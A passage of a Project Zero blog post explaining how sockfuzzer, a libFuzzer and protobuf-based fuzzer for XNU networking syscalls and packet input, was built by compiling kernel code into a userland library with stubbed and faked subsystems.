Designing sockfuzzer, a network syscall fuzzer for XNU


Posted by Ned Williamson, Project Zero Introduction When I started my 20% project – an initiative where employees are allocated twenty-percent of their paid work time to pursue personal projects – with Project Zero, I wanted to see if I could apply the techniques I had learned fuzzing Chrome to XNU, the kernel used in iOS and macOS. My interest was sparked after learning some prominent members of the iOS research community believed the kernel was “fuzzed to death,” and my understanding was that most of the top researchers used auditing for vulnerability research. This meant finding new bugs with fuzzing would be meaningful in demonstrating the value of implementing newer fuzzing techniques. In this project, I pursued a somewhat unusual approach to fuzz XNU networking in userland by converting it into a library, “booting” it in userspace and using my standard fuzzing workflow to discover vulnerabilities. Somewhat surprisingly, this worked well enough to reproduce some of my peers’ recent discoveries and report some of my own, one of which was a reliable privilege escalation from the app context, CVE-2019-8605, dubbed “SockPuppet.” I’m excited to open source this fuzzing project, “sockfuzzer,” for the community to learn from and adapt. In this post, we’ll do a deep dive into its design and implementation. Attack Surface Review and Target Planning # Choosing Networking We’re at the beginning of a multistage project. I had enormous respect for the difficulty of the task ahead of me. I knew I would need to be careful investing time at each stage of the process, constantly looking for evidence that I needed to change direction. The first big decision was to decide what exactly we wanted to target. I started by downloading the [XNU sources](<https://opensource.apple.com/tarballs/xnu/>) and reviewing them, looking for areas that handled a lot of attacker-controlled input and seemed amenable to fuzzing – immediately the networking subsystem jumped out as worthy of research. I had just exploited a Chrome sandbox bug that leveraged collaboration between an exploited renderer process and a server working in concert. I recognized these attack surfaces’ power, where some security-critical code is “sandwiched” between two attacker-controlled entities. The Chrome browser process is prone to use after free vulnerabilities due to the difficulty of managing state for large APIs, and I suspected XNU would have the same issue. Networking features both parsing and state management. I figured that even if others had already fuzzed the parsers extensively, there could still be use after free vulnerabilities lying dormant. I then proceeded to look at recent bug reports. Two bugs that caught my eye: the [mptcp overflow](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1558>) discovered by Ian Beer and the ICMP [out of bounds write](<https://securitylab.github.com/research/apple-xnu-icmp-error-CVE-2018-4407>) found by Kevin Backhouse. Both of these are somewhat “straightforward” buffer overflows. The bugs’ simplicity hinted that kernel networking, even packet parsing, was sufficiently undertested. A fuzzer combining network syscalls and arbitrary remote packets should be large enough in scope to reproduce these issues and find new ones. Digging deeper, I wanted to understand how to reach these bugs in practice. By cross-referencing the functions and setting kernel breakpoints in a VM, I managed to get a more concrete idea. Here’s the call stack for Ian’s MPTCP bug: [![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixaqhrlPJxgqVridccvdElpi6yxaoJCSUXDp5q8hm_F66e5WHW3NRaFwmy-OWQvCKz661k3LEfi4A4r2sa1LkgMb8pu8CEVjKbzTkblc8SZZYcOsKkw7u0uG2qo5KzCdjbxixJ-CplQI2nohuVE1_t07PiNW-xRxnW-3e4WtILcCE6CoYjbN1D6UPi/s623/image3%282%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixaqhrlPJxgqVridccvdElpi6yxaoJCSUXDp5q8hm_F66e5WHW3NRaFwmy-OWQvCKz661k3LEfi4A4r2sa1LkgMb8pu8CEVjKbzTkblc8SZZYcOsKkw7u0uG2qo5KzCdjbxixJ-CplQI2nohuVE1_t07PiNW-xRxnW-3e4WtILcCE6CoYjbN1D6UPi/s623/image3%282%29.png>) The buggy function in question is mptcp_usr_connectx. Moving up the call stack, we find the connectx syscall, which we see in Ian’s original testcase. If we were to write a fuzzer to find this bug, how would we do it? Ultimately, whatever we do has to both find the bug and give us the information we need to reproduce it on the real kernel. Calling mptcp_usr_connectx directly should surely find the bug, but this seems like the wrong idea because it takes a lot of arguments. Modeling a fuzzer well enough to call this function directly in a way representative of the real code is no easier than auditing the code in the first place, so we’ve not made things any easier by writing a targeted fuzzer. It’s also wasted effort to write a target for each function this small. On the other hand, the further up the call stack we go, the more complexity we may have to support and the less chance we have of landing on the bug. If I were trying to unit test the networking stack, I would probably avoid the syscall layer and call the intermediate helper functions as a middle ground. This is exactly what I tried in the first draft of the fuzzer; I used [sock_socket](<https://developer.apple.com/documentation/kernel/1396122-sock_socket>) to create struct socket* objects to pass to connectitx in the hopes that it would be easy to reproduce this bug while being high-enough level that this bug could plausibly have been discovered without knowing where to look for it. Surprisingly, after some experimentation, it turned out to be easier to simply call the syscalls directly (via connectx). This makes it easier to translate crashing inputs into programs to run against a real kernel since testcases map 1:1 to syscalls. We’ll see more details about this later. We can’t test networking properly without accounting for packets. In this case, data comes from the hardware, not via syscalls from a user process. We’ll have to expose this functionality to our fuzzer. To figure out how to extend our framework to support random packet delivery, we can use our next example bug. Let’s take a look at the call stack for delivering a packet to trigger the ICMP bug reported by Kevin Backhouse: [![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN_4qMCDG0R3Ix94ctakWAgk3QmZ1JVD0IxQVjr9ft44Eu2a3VYxzWkueZJvf8MUd2qsf2Z-Qk2elUh_Zl-Cx5D9k6ueDM-pJNT9LeT3Ruhtc_CAgn0SL1M2XVCL_BYiTya834YqPEYuU5kH0nU68d7eUJrsUuY-hGEZ3EfiX_yCZ7ZvlDnQoQceOe/s450/image2%281%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN_4qMCDG0R3Ix94ctakWAgk3QmZ1JVD0IxQVjr9ft44Eu2a3VYxzWkueZJvf8MUd2qsf2Z-Qk2elUh_Zl-Cx5D9k6ueDM-pJNT9LeT3Ruhtc_CAgn0SL1M2XVCL_BYiTya834YqPEYuU5kH0nU68d7eUJrsUuY-hGEZ3EfiX_yCZ7ZvlDnQoQceOe/s450/image2%281%29.png>) To reach the buggy function, icmp_error, the call stack is deeper, and unlike with syscalls, it’s not immediately obvious which of these functions we should call to cover the relevant code. Starting from the very top of the call stack, we see that the crash occurred in a kernel thread running the dlil_input_thread_func function. DLIL stands for Data Link Interface Layer, a reference to the OSI model’s [data link layer](<https://en.wikipedia.org/wiki/Data_link_layer>). Moving further down the stack, we see ether_inet_input, indicating an Ethernet packet (since I tested this issue using Ethernet). We finally make it down to the IP layer, where ip_dooptions signals an icmp_error. As an attacker, we probably don’t have a lot of control over the interface a user uses to receive our input, so we can rule out some of the uppermost layers. We also don’t want to deal with threads in our fuzzer, another design tradeoff we’ll describe in more detail later. proto_input and ip_proto_input don’t do much, so I decided that ip_proto was where I would inject packets, simply by calling the function when I wanted to deliver a packet. After reviewing proto_register_input, I discovered another function called ip6_input, which was the entry point for the IPv6 code. Here’s the prototype for ip_input: void ip_input(struct mbuf *m); --- Mbufs are message buffers, a standard buffer format used in network stacks. They enable multiple small packets to be chained together through a linked list. So we just need to generate mbufs with random data before calling ip_input. I was surprised by how easy it was to work with the network stack compared to the syscall interface. `ip_input` and `ip6_input` pure functions that don’t require us to know any state to call them. But stepping back, it made more sense. Packet delivery is inherently a clean interface: our kernel has no idea what arbitrary packets may be coming in, so the interface takes a raw packet and then further down in the stack decides how to handle it. Many packets contain metadata that affect the kernel state once received. For example, TCP or UDP packets will be matched to an existing connection by their port number. Most modern coverage guided fuzzers, including this LibFuzzer-based project, use a design inspired by AFL. When a test case with some known coverage is mutated and the mutant produces coverage that hasn’t been seen before, the mutant is added to the current corpus of inputs. It becomes available for further mutations to produce even deeper coverage. Lcamtuf, the author of AFL, has an excellent demonstration of how this algorithm [created JPEGs using coverage feedback](<https://lcamtuf.blogspot.com/2014/11/pulling-jpegs-out-of-thin-air.html>) with no well-formed starting samples. In essence, most poorly-formed inputs are rejected early. When a mutated input passes a validation check, the input is saved. Then that input can be mutated until it manages to pass the second validation check, and so on. This hill climbing algorithm has no problem generating dependent sequences of API calls, in this case to interleave syscalls with ip_input and ip6_input. Random syscalls can get the kernel into some state where it’s expecting a packet. Later, when libFuzzer guesses a packet that gets the kernel into some new state, the hill climbing algorithm will record a new test case when it sees new coverage. Dependent sequences of syscalls and packets are brute-forced in a linear fashion, one call at a time. Designing for (Development) Speed Now that we know where to attack this code base, it’s a matter of building out the fuzzing research platform. I like thinking of it this way because it emphasizes that this fuzzer is a powerful assistant to a researcher, but it can’t do all the work. Like any other test framework, it empowers the researcher to make hypotheses and run experiments over code that looks buggy. For the platform to be helpful, it needs to be comfortable and fun to work with and get out of the way. When it comes to standard practice for kernel fuzzing, there’s a pretty simple spectrum for strategies. On one end, you fuzz self-contained functions that are security-critical, e.g., OSUnserializeBinary. These are easy to write and manage and are generally quite performant. On the other end, you have “end to end” kernel testing that performs random syscalls against a real kernel instance. These heavyweight fuzzers have the advantage of producing issues that you know are actionable right away, but setup and iterative development are slower. I wanted to try a hybrid approach that could preserve some of the benefits of each style. To do so, I would port the networking stack of XNU out of the kernel and into userland while preserving as much of the original code as possible. Kernel code can be surprisingly portable and amenable to unit testing, even when run outside its natural environment. There has been a push to add more user-mode unit testing to Linux. If you look at the documentation for Linux’s [KUnit project](<https://www.kernel.org/doc/html/latest/dev-tools/kunit/index.html>), there’s an excellent quote from Linus Torvalds: “… a lot of people seem to think that performance is about doing the same thing, just doing it faster, and that is not true. That is not what performance is all about. If you can do something really fast, really well, people will start using it differently.” This statement echoes the experience I had writing targeted fuzzers for code in Chrome’s browser process. Due to extensive unit testing, Chrome code is already well-factored for fuzzing. In a day’s work, I could try out many iterations of a fuzz target and the edit/build/run cycle. I didn’t have a similar mechanism out of the box with XNU. In order to perform a unit test, I would need to rebuild the kernel. And despite XNU being considerably smaller than Chrome, incremental builds were slower due to the older kmk build system. I wanted to try bridging this gap for XNU. Setting up the Scaffolding “Unit” testing a kernel up through the syscall layer sounds like a big task, but it’s easier than you’d expect if you forgo some complexity. We’ll start by building all of the individual kernel object files from source using the original build flags. But instead of linking everything together to produce the final kernel binary, we link in only the subset of objects containing code in our target attack surface. We then stub or fake the rest of the functionality. Thanks to the recon in the previous section, we already know which functions we want to call from our fuzzer. I used that information to prepare a minimal list of source objects to include in our userland port. Before we dive in, let’s define the overall structure of the project as pictured below. There’s going to be a fuzz target implemented in C++ that translates fuzzed inputs into interactions with the userland XNU library. The target code, libxnu, exposes a few wrapper symbols for syscalls and ip_input as mentioned in the attack surface review section. The fuzz target also exposes its random sequence of bytes to kernel APIs such as copyin or copyout, whose implementations have been replaced with fakes that use fuzzed input data. [![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd7HxZOpEaZ0zOKXMwVP0f3hRjwuUrChoR3_v_y91gddRnq4T-t7FCJt5mmG3EGwaK3-HT_hibQyi-0CgwigF9hGZBfNaJhssUQG0KBYoyVGpXRHWgtVAUhC1EOgHgyb_vfiqdYGWxZE7N9y0ysw-0ikT-Kj_ljONiFGGMUPagiidn4dzLgSP8EvX-/s1051/image1%283%29.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd7HxZOpEaZ0zOKXMwVP0f3hRjwuUrChoR3_v_y91gddRnq4T-t7FCJt5mmG3EGwaK3-HT_hibQyi-0CgwigF9hGZBfNaJhssUQG0KBYoyVGpXRHWgtVAUhC1EOgHgyb_vfiqdYGWxZE7N9y0ysw-0ikT-Kj_ljONiFGGMUPagiidn4dzLgSP8EvX-/s1051/image1%283%29.png>) To make development more manageable, I decided to create a new build system using CMake, as it supported Ninja for fast rebuilds. One drawback here is the original build system has to be run every time upstream is updated to deal with generated sources, but this is worth it to get a faster development loop. I captured all of the compiler invocations during a normal kernel build and used those to reconstruct the flags passed to build the various kernel subsystems. Here’s what that first pass looks like: project(libxnu) set(XNU_DEFINES -DAPPLE -DKERNEL # ... ) set(XNU_SOURCES bsd/conf/param.c bsd/kern/kern_asl.c bsd/net/if.c bsd/netinet/ip_input.c # ... ) add_library(xnu SHARED ${XNU_SOURCES} ${FUZZER_FILES} ${XNU_HEADERS}) protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto) add_executable(net_fuzzer fuzz/net_fuzzer.cc ${NET_PROTO_SRCS} ${NET_PROTO_HDRS}) target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator) target_compile_options(net_fuzzer PRIVATE ${FUZZER_CXX_FLAGS}) --- Of course, without the rest of the kernel, we see tons of missing symbols. "_zdestroy", referenced from: _if_clone_detach in libxnu.a(if.c.o) "_zfree", referenced from: _kqueue_destroy in libxnu.a(kern_event.c.o) _knote_free in libxnu.a(kern_event.c.o) _kqworkloop_get_or_create in libxnu.a(kern_event.c.o) _kev_delete in libxnu.a(kern_event.c.o) _pipepair_alloc in libxnu.a(sys_pipe.c.o) _pipepair_destroy_pipe in libxnu.a(sys_pipe.c.o) _so_cache_timer in libxnu.a(uipc_socket.c.o) ... "_zinit", referenced from: _knote_init in libxnu.a(kern_event.c.o) _kern_event_init in libxnu.a(kern_event.c.o) _pipeinit in libxnu.a(sys_pipe.c.o) _socketinit in libxnu.a(uipc_socket.c.o) _unp_init in libxnu.a(uipc_usrreq.c.o) _cfil_init in libxnu.a(content_filter.c.o) _tcp_init in libxnu.a(tcp_subr.c.o) ... "_zone_change", referenced from: _knote_init in libxnu.a(kern_event.c.o) _kern_event_init in libxnu.a(kern_event.c.o) _socketinit in libxnu.a(uipc_socket.c.o) _cfil_init in libxnu.a(content_filter.c.o) _tcp_init in libxnu.a(tcp_subr.c.o) _ifa_init in libxnu.a(if.c.o) _if_clone_attach in libxnu.a(if.c.o) ... ld: symbol(s) not found for architecture x86_64 clang: error: linker command failed with exit code 1 (use -v to see invocation) ninja: build stopped: subcommand failed. --- To get our initial targeted fuzzer working, we can do a simple trick by linking against a file containing stubbed implementations of all of these. We take advantage of C’s weak type system here. For each function we need to implement, we can link an implementation void func() { assert(false); }. The arguments passed to the function are simply ignored, and a crash will occur whenever the target code attempts to call it. This goal can be achieved with linker flags, but it was a simple enough solution that allowed me to get nice backtraces when I hit an unimplemented function. // Unimplemented stub functions // These should be replaced with real or mock impls. #include <kern/assert.h> #include <stdbool.h> int printf(const char* format, ...); void Assert(const char* file, int line, const char* expression) { printf("%s: assert failed on line %d: %s\n", file, line, expression); __builtin_trap(); } void IOBSDGetPlatformUUID() { assert(false); } void IOMapperInsertPage() { assert(false); } // ... --- Then we just link this file into the XNU library we’re building by adding it to the source list: set(XNU_SOURCES bsd/conf/param.c bsd/kern/kern_asl.c # ... fuzz/syscall_wrappers.c fuzz/ioctl.c fuzz/backend.c fuzz/stubs.c fuzz/fake_impls.c --- As you can see, there are some other files I included in the XNU library that represent faked implementations and helper code to expose some internal kernel APIs. To make sure our fuzz target will call code in the linked library, and not some other host functions (syscalls) with a clashing name, we hide all of the symbols in libxnu by default and then expose a set of wrappers that call those functions on our behalf. I hide all the names by default using a CMake setting set_target_properties(xnu PROPERTIES C_VISIBILITY_PRESET hidden). Then we can link in a file (fuzz/syscall_wrappers.c) containing wrappers like the following: __attribute__((visibility("default"))) int accept_wrapper(int s, caddr_t name, socklen_t* anamelen, int* retval) { struct accept_args uap = { .s = s, .name = name, .anamelen = anamelen, }; return accept(kernproc, &uap, retval); } --- Note the visibility attribute that explicitly exports the symbol from the library. Due to the simplicity of these wrappers I created a script to automate this called generate_fuzzer.py using syscalls.master. With the stubs in place, we can start writing a fuzz target now and come back to deal with implementing them later. We will see a crash every time the target code attempts to use one of the functions we initially left out. Then we get to decide to either include the real implementation (and perhaps recursively require even more stubbed function implementations) or to fake the functionality. A bonus of getting a build working with CMake was to create multiple targets with different instrumentation. Doing so allows me to generate coverage reports using clang-coverage: target_compile_options(xnu-cov PRIVATE ${XNU_C_FLAGS} -DLIBXNU_BUILD=1 -D_FORTIFY_SOURCE=0 -fprofile-instr-generate -fcoverage-mapping) --- With that, we just add a fuzz target file and a protobuf file to use with protobuf-mutator and we’re ready to get started: protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto) add_executable(net_fuzzer fuzz/net_fuzzer.cc ${NET_PROTO_SRCS} ${NET_PROTO_HDRS}) target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator) target_compile_options(net_fuzzer PRIVATE -g -std=c++11 -Werror -Wno-address-of-packed-member ${FUZZER_CXX_FLAGS}) if(APPLE) target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES}) else() target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES} pthread) endif(APPLE) --- Writing a Fuzz Target At this point, we’ve assembled a chunk of XNU into a convenient library, but we still need to interact with it by writing a fuzz target. At first, I thought I might write many targets for different features, but I decided to write one monolithic target for this project. I’m sure fine-grained targets could do a better job for functionality that’s harder to fuzz, e.g., the TCP state machine, but we will stick to one for simplicity. We’ll start by specifying an input grammar using protobuf, part of which is depicted below. This grammar is completely arbitrary and will be used by a corresponding C++ harness that we will write next. LibFuzzer has a plugin called libprotobuf-mutator that knows how to mutate protobuf messages. This will enable us to do grammar-based mutational fuzzing efficiently, while still leveraging coverage guided feedback. This is a very powerful combination. message Socket { required Domain domain = 1; required SoType so_type = 2; required Protocol protocol = 3; // TODO: options, e.g. SO_ACCEPTCONN } message Close { required FileDescriptor fd = 1; } message SetSocketOpt { optional Protocol level = 1; optional SocketOptName name = 2; // TODO(nedwill): structure for val optional bytes val = 3; optional FileDescriptor fd = 4; } message Command { oneof command { Packet ip_input = 1; SetSocketOpt set_sock_opt = 2; Socket socket = 3; Close close = 4; } } message Session { repeated Command commands = 1; required bytes data_provider = 2; } --- I left some TODO comments intact so you can see how the grammar can always be improved. As I’ve done in similar fuzzing projects, I have a top-level message called Session that encapsulates a single fuzzer iteration or test case. This session contains a sequence of “commands” and a sequence of bytes that can be used when random, unstructured data is needed (e.g., when doing a copyin). Commands are syscalls or random packets, which in turn are their own messages that have associated data. For example, we might have a session that has a single Command message containing a “Socket” message. That Socket message has data associated with each argument to the syscall. In our C++-based target, it’s our job to translate messages of this custom specification into real syscalls and related API calls. We inform libprotobuf-mutator that our fuzz target expects to receive one “Session” message at a time via the macro DEFINE_BINARY_PROTO_FUZZER. DEFINE_BINARY_PROTO_FUZZER(const Session &session) { // ... std::set<int> open_fds; for (const Command &command : session.commands()) { int retval = 0; switch (command.command_case()) { case Command::kSocket: { int fd = 0; int err = socket_wrapper(command.socket().domain(), command.socket().so_type(), command.socket().protocol(), &fd); if (err == 0) { // Make sure we're tracking fds properly. if (open_fds.find(fd) != open_fds.end()) { printf("Found existing fd %d\n", fd); assert(false); } open_fds.insert(fd); } break; } case Command::kClose: { open_fds.erase(command.close().fd()); close_wrapper(command.close().fd(), nullptr); break; } case Command::kSetSockOpt: { int s = command.set_sock_opt().fd(); int level = command.set_sock_opt().level(); int name = command.set_sock_opt().name(); size_t size = command.set_sock_opt().val().size(); std::unique_ptr<char[]> val(new char[size]); memcpy(val.get(), command.set_sock_opt().val().data(), size); setsockopt_wrapper(s, level, name, val.get(), size, nullptr); break; } --- While syscalls are typically a straightforward translation of the protobuf message, other commands are more complex. In order to improve the structure of randomly generated packets, I added custom message types that I then converted into the relevant on-the-wire structure before passing it into ip_input. Here’s how this looks for TCP: message Packet { oneof packet { TcpPacket tcp_packet = 1; } } message TcpPacket { required IpHdr ip_hdr = 1; required TcpHdr tcp_hdr = 2; optional bytes data = 3; } message IpHdr { required uint32 ip_hl = 1; required IpVersion ip_v = 2; required uint32 ip_tos = 3; required uint32 ip_len = 4; required uint32 ip_id = 5; required uint32 ip_off = 6; required uint32 ip_ttl = 7; required Protocol ip_p = 8; required InAddr ip_src = 9; required InAddr ip_dst = 10; } message TcpHdr { required Port th_sport = 1; required Port th_dport = 2; required TcpSeq th_seq = 3; required TcpSeq th_ack = 4; required uint32 th_off = 5; repeated TcpFlag th_flags = 6; required uint32 th_win = 7; required uint32 th_sum = 8; required uint32 th_urp = 9; // Ned's extensions required bool is_pure_syn = 10; required bool is_pure_ack = 11; } --- Unfortunately, protobuf doesn’t support a uint8 type, so I had to use uint32 for some fields. That’s some lost fuzzing performance. You can also see some synthetic TCP header flags I added to make certain flag combinations more likely: is_pure_syn and is_pure_ack. Now I have to write some code to stitch together a valid packet from these nested fields. Shown below is the code to handle just the TCP header. std::string get_tcp_hdr(const TcpHdr &hdr) { struct tcphdr tcphdr = { .th_sport = (unsigned short)hdr.th_sport(), .th_dport = (unsigned short)hdr.th_dport(), .th_seq = __builtin_bswap32(hdr.th_seq()), .th_ack = __builtin_bswap32(hdr.th_ack()), .th_off = hdr.th_off(), .th_flags = 0, .th_win = (unsigned short)hdr.th_win(), .th_sum = 0, // TODO(nedwill): calculate the checksum instead of skipping it .th_urp = (unsigned short)hdr.th_urp(), }; for (const int flag : hdr.th_flags()) { tcphdr.th_flags ^= flag; } // Prefer pure syn if (hdr.is_pure_syn()) { tcphdr.th_flags &= ~(TH_RST | TH_ACK); tcphdr.th_flags |= TH_SYN; } else if (hdr.is_pure_ack()) { tcphdr.th_flags &= ~(TH_RST | TH_SYN); tcphdr.th_flags |= TH_ACK; } std::string dat((char *)&tcphdr, (char *)&tcphdr + sizeof(tcphdr)); return dat; } --- As you can see, I make liberal use of a custom grammar to enable better quality fuzzing. These efforts are worth it, as randomizing high level structure is more efficient. It will also be easier for us to interpret crashing test cases later as they will have the same high level representation. High-Level Emulation Now that we have the code building and an initial fuzz target running, we begin the first pass at implementing all of the stubbed code that is reachable by our fuzz target. Because we have a fuzz target that builds and runs, we now get instant feedback about which functions our target hits. Some core functionality has to be supported before we can find any bugs, so the first attempt to run the fuzzer deserves its own development phase. For example, until dynamic memory allocation is supported, almost no kernel code we try to cover will work considering how heavily such code is used. We’ll be implementing our stubbed functions with fake variants that attempt to have the same semantics. For example, when testing code that uses an external database library, you could replace the database with a simple in-memory implementation. If you don’t care about finding database bugs, this often makes fuzzing simpler and more robust. For some kernel subsystems unrelated to networking we can use entirely different or null implementations. This process is reminiscent of high-level emulation, an idea used in game console emulation. Rather than aiming to emulate hardware, you can try to preserve the semantics but use a custom implementation of the API. Because we only care about testing networking, this is how we approach faking subsystems in this project. I always start by looking at the original function implementation. If it’s possible, I just link in that code as well. But some functionality isn’t compatible with our fuzzer and must be faked. For example, zalloc should call the userland malloc since virtual memory is already managed by our host kernel and we have allocator facilities available. Similarly, copyin and copyout need to be faked as they no longer serve to copy data between user and kernel pages. Sometimes we also just “nop” out functionality that we don’t care about. We’ll cover these decisions in more detail later in the “High-Level Emulation” phase. Note that by implementing these stubs lazily whenever our fuzz target hits them, we immediately reduce the work in handling all the unrelated functions by an order of magnitude. It’s easier to stay motivated when you only implement fakes for functions that are used by the target code. This approach successfully saved me a lot of time and I’ve used it on subsequent projects as well. At the time of writing, I have 398 stubbed functions, about 250 functions that are trivially faked (return 0 or void functions that do nothing), and about 25 functions that I faked myself (almost all related to porting the memory allocation systems to userland). # Booting Up As soon as we start running the fuzzer, we’ll run into a snag: many resources require a one-time initialization that happens on boot. The BSD half of the kernel is mostly initialized by calling the bsd_init function. That function, in turn, calls several subsystem-specific initialization functions. Keeping with the theme of supporting a minimally necessary subset of the kernel, rather than call bsd_init, we create a new function that only initializes parts of the kernel as needed. Here’s an example crash that occurs without the one time kernel bootup initialization: #7 0x7effbc464ad0 in zalloc /source/build3/../fuzz/zalloc.c:35:3 #8 0x7effbb62eab4 in pipepair_alloc /source/build3/../bsd/kern/sys_pipe.c:634:24 #9 0x7effbb62ded5 in pipe /source/build3/../bsd/kern/sys_pipe.c:425:10 #10 0x7effbc4588ab in pipe_wrapper /source/build3/../fuzz/syscall_wrappers.c:216:10 #11 0x4ee1a4 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:979:19 --- Our zalloc implementation (covered in the next section) failed because the pipe zone wasn’t yet initialized: static int pipepair_alloc(struct pipe **rp_out, struct pipe **wp_out) { struct pipepair *pp = zalloc(pipe_zone); --- Scrolling up in sys_pipe.c, we see where that zone is initialized: void pipeinit(void) { nbigpipe = 0; vm_size_t zone_size; zone_size = 8192 * sizeof(struct pipepair); pipe_zone = zinit(sizeof(struct pipepair), zone_size, 4096, "pipe zone"); --- Sure enough, this function is called by bsd_init. By adding that to our initial setup function the zone works as expected. After some development cycles spent supporting all the needed bsd_init function calls, we have the following: __attribute__((visibility("default"))) bool initialize_network() { mcache_init(); mbinit(); eventhandler_init(); pipeinit(); dlil_init(); socketinit(); domaininit(); loopattach(); ether_family_init(); tcp_cc_init(); net_init_run(); int res = necp_init(); assert(!res); return true; } --- The original bsd_init is 683 lines long, but our initialize_network clone is the preceding short snippet. I want to remark how cool I found it that you could “boot” a kernel like this and have everything work so long as you implemented all the relevant stubs. It just goes to show a surprising fact: a significant amount of kernel code is portable, and simple steps can be taken to make it testable. These codebases can be modernized without being fully rewritten. As this “boot” relies on dynamic allocation, let’s look at how I implemented that next. # Dynamic Memory Allocation Providing a virtual memory abstraction is a fundamental goal of most kernels, but the good news is this is out of scope for this project (this is left as an exercise for the reader). Because networking already assumes working virtual memory, the network stack functions almost entirely on top of high-level allocator APIs. This makes the subsystem amenable to “high-level emulation”. We can create a thin shim layer that intercepts XNU specific allocator calls and translates them to the relevant host APIs. In practice, we have to handle three types of allocations for this project: “classic” allocations (malloc/calloc/free), zone allocations (zalloc), and mbuf (memory buffers). The first two types are more fundamental allocation types used across XNU, while mbufs are a common data structure used in low-level networking code. The zone allocator is reasonably complicated, but we use a simplified model for our purposes: we just track the size assigned to a zone when it is created and make sure we malloc that size when zalloc is later called using the initialized zone. This could undoubtedly be modeled better, but this initial model worked quite well for the types of bugs I was looking for. In practice, this simplification affects exploitability, but we aren’t worried about that for a fuzzing project as we can assess that manually once we discover an issue. As you can see below, I created a custom zone type that simply stored the configured size, knowing that my zinit would return an opaque pointer that would be passed to my zalloc implementation, which could then use calloc to service the request. zfree simply freed the requested bytes and ignored the zone, as allocation sizes are tracked by the host malloc already. struct zone { uintptr_t size; }; struct zone* zinit(uintptr_t size, uintptr_t max, uintptr_t alloc, const char* name) { struct zone* zone = (struct zone*)calloc(1, sizeof(struct zone)); zone->size = size; return zone; } void* zalloc(struct zone* zone) { assert(zone != NULL); return calloc(1, zone->size); } void zfree(void* zone, void* dat) { (void)zone; free(dat); } --- Kalloc, kfree, and related functions were passed through to malloc and free as well. You can see fuzz/zalloc.c for their implementations. Mbufs (memory buffers) are more work to implement because they contain considerable metadata that is exposed to the “client” networking code. struct m_hdr { struct mbuf *mh_next; /* next buffer in chain */ struct mbuf *mh_nextpkt; /* next chain in queue/record */ caddr_t mh_data; /* location of data */ int32_t mh_len; /* amount of data in this mbuf */ u_int16_t mh_type; /* type of data in this mbuf */ u_int16_t mh_flags; /* flags; see below */ }; /* * The mbuf object */ struct mbuf { struct m_hdr m_hdr; union { struct { struct pkthdr MH_pkthdr; /* M_PKTHDR set */ union { struct m_ext MH_ext; /* M_EXT set */ char MH_databuf[_MHLEN]; } MH_dat; } MH; char M_databuf[_MLEN]; /* !M_PKTHDR, !M_EXT */ } M_dat; }; --- I didn’t include the pkthdr nor m_ext structure definitions, but they are nontrivial (you can see for yourself in bsd/sys/mbuf.h). A lot of trial and error was needed to create a simplified mbuf format that would work. In practice, I use an inline buffer when possible and, when necessary, locate the data in one large external buffer and set the M_EXT flag. As these allocations must be aligned, I use posix_memalign to create them, rather than malloc. Fortunately ASAN can help manage these allocations, so we can detect some bugs with this modification. Two bugs I reported via the Project Zero tracker highlight the benefit of the heap-based mbuf implementation. In the [first report](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1981>), I detected an mbuf double free using ASAN. While the m_free implementation tries to detect double frees by checking the state of the allocation, ASAN goes even further by quarantining recently freed allocations to detect the bug. In this case, it looks like the fuzzer would have found the bug either way, but it was impressive. The [second issue](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1976>) linked is much subtler and requires some instrumentation to detect the bug, as it is a use after free read of an mbuf: ==22568==ERROR: AddressSanitizer: heap-use-after-free on address 0x61500026afe5 at pc 0x7ff60f95cace bp 0x7ffd4d5617b0 sp 0x7ffd4d5617a8 READ of size 1 at 0x61500026afe5 thread T0 #0 0x7ff60f95cacd in tcp_input bsd/netinet/tcp_input.c:5029:25 #1 0x7ff60f949321 in tcp6_input bsd/netinet/tcp_input.c:1062:2 #2 0x7ff60fa9263c in ip6_input bsd/netinet6/ip6_input.c:1277:10 0x61500026afe5 is located 229 bytes inside of 256-byte region [0x61500026af00,0x61500026b000) freed by thread T0 here: #0 0x4a158d in free /b/swarming/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3 #1 0x7ff60fb7444d in m_free fuzz/zalloc.c:220:3 #2 0x7ff60f4e3527 in m_freem bsd/kern/uipc_mbuf.c:4842:7 #3 0x7ff60f5334c9 in sbappendstream_rcvdemux bsd/kern/uipc_socket2.c:1472:3 #4 0x7ff60f95821d in tcp_input bsd/netinet/tcp_input.c:5019:8 #5 0x7ff60f949321 in tcp6_input bsd/netinet/tcp_input.c:1062:2 #6 0x7ff60fa9263c in ip6_input bsd/netinet6/ip6_input.c:1277:10 --- Apple managed to catch this issue before I reported it, fixing it in iOS 13. I believe Apple has added some internal hardening or testing for mbufs that caught this bug. It could be anything from a hardened mbuf allocator like [GWP-ASAN](<https://llvm.org/docs/GwpAsan.html>), to an internal ARM MTE test, to simple auditing, but it was really cool to see this issue detected in this way, and also that Apple was proactive enough to find this themselves. # Accessing User Memory When talking about this project with a fellow attendee at a fuzzing conference, their biggest question was how I handled user memory access. Kernels are never supposed to trust pointers provided by user-space, so whenever the kernel wants to access memory-mapped in userspace, it goes through intermediate functions copyin and copyout. By replacing these functions with our fake implementations, we can supply fuzzer-provided input to the tested code. The real kernel would have done the relevant copies from user to kernel pages. Because these copies are driven by the target code and not our testcase, I added a buffer in the protobuf specification to be used to service these requests. Here’s a backtrace from our stub before we implement `copyin`. As you can see, when calling the `recvfrom` syscall, our fuzzer passed in a 